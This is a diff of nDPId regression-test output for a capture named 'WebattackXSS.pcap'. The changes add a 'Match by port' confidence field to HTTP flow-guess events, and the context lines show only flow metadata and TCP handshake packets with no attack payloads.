 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347758774,"flow_last_seen":1499347763831,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347886026,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60626,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347761418,"flow_last_seen":1499347766830,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347886026,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60652,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347761418,"flow_last_seen":1499347766830,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347886026,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60652,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347761418,"flow_last_seen":1499347766830,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347886026,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60652,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347762675,"flow_last_seen":1499347767831,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347886026,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60666,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347762675,"flow_last_seen":1499347767831,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347886026,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60666,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347762675,"flow_last_seen":1499347767831,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347886026,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60666,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7636,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347886296,"flow_last_seen":1499347886296,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347886296,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33728,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7636,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":540,"flow_packet_id":1,"flow_last_seen":1499347886296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347886296,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8J3NAAD4Gnl2sEAABwKgKMoPAAFDfgE5wAAAAAKACchBCwwAAAgQFtAQCCAoBPGkDAAAAAAEDAwc="}
@@ -3118,19 +3118,19 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7709,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":545,"flow_packet_id":1,"flow_last_seen":1499347895396,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347895396,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8+PRAAD4GzNusEAABwKgKMoQeAFBBmIkSAAAAAKACchCcyAAAAgQFtAQCCAoBPHHmAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7710,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":545,"flow_packet_id":2,"flow_last_seen":1499347895397,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347895397,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhB6fI8DwQZiJE6AScSD2UgAAAgQFtAQCCAoD5kNaATxx5gEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7711,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":545,"flow_packet_id":3,"flow_last_seen":1499347895397,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347895397,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0+PVAAD4GzOKsEAABwKgKMoQeAFBBmIkTnyPA8YAQAOWVWgAAAQEICgE8ceYD5kNa"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347765229,"flow_last_seen":1499347770831,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347896413,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60692,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347765229,"flow_last_seen":1499347770831,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347896413,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60692,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347765229,"flow_last_seen":1499347770831,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347896413,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60692,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347766506,"flow_last_seen":1499347771832,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347896413,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60706,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347766506,"flow_last_seen":1499347771832,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347896413,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60706,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347766506,"flow_last_seen":1499347771832,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347896413,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60706,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347767793,"flow_last_seen":1499347772833,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347896413,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60720,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347767793,"flow_last_seen":1499347772833,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347896413,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60720,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347767793,"flow_last_seen":1499347772833,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347896413,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60720,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347769077,"flow_last_seen":1499347774833,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347896413,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60734,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347769077,"flow_last_seen":1499347774833,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347896413,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60734,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347769077,"flow_last_seen":1499347774833,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347896413,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60734,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347770345,"flow_last_seen":1499347775834,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347896413,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60748,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347770345,"flow_last_seen":1499347775834,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347896413,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60748,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347770345,"flow_last_seen":1499347775834,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347896413,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60748,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347771635,"flow_last_seen":1499347776834,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347896413,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60762,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347771635,"flow_last_seen":1499347776834,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347896413,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60762,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347771635,"flow_last_seen":1499347776834,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347896413,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60762,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347774205,"flow_last_seen":1499347779835,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347896413,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60788,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347774205,"flow_last_seen":1499347779835,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347896413,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60788,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347774205,"flow_last_seen":1499347779835,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347896413,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60788,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7722,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347896716,"flow_last_seen":1499347896716,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347896716,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33836,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7722,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":546,"flow_packet_id":1,"flow_last_seen":1499347896716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347896716,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8SsxAAD4GewSsEAABwKgKMoQsAFDW1Dn8AAAAAKACchBVSgAAAgQFtAQCCAoBPHMwAAAAAAEDAwc="}
@@ -3156,17 +3156,17 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7794,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":551,"flow_packet_id":1,"flow_last_seen":1499347905694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347905694,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8dZJAAD4GUD6sEAABwKgKMoSKAFAcIA5mAAAAAKACchAycwAAAgQFtAQCCAoBPHv0AAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7795,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":551,"flow_packet_id":2,"flow_last_seen":1499347905694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347905694,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhIr8f9XqHCAOZ6AScSAPmAAAAgQFtAQCCAoD5k1pATx79AEDAwc="}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7796,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":551,"flow_packet_id":3,"flow_last_seen":1499347905695,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347905695,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0dZNAAD4GUEWsEAABwKgKMoSKAFAcIA5n\/H\/V64AQAOWunwAAAQEICgE8e\/QD5k1p"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347775487,"flow_last_seen":1499347780836,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347906722,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60802,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347775487,"flow_last_seen":1499347780836,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347906722,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60802,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347775487,"flow_last_seen":1499347780836,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347906722,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60802,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347776753,"flow_last_seen":1499347781835,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347906722,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60816,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347776753,"flow_last_seen":1499347781835,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347906722,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60816,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347776753,"flow_last_seen":1499347781835,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347906722,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347779333,"flow_last_seen":1499347784836,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347906722,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60842,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
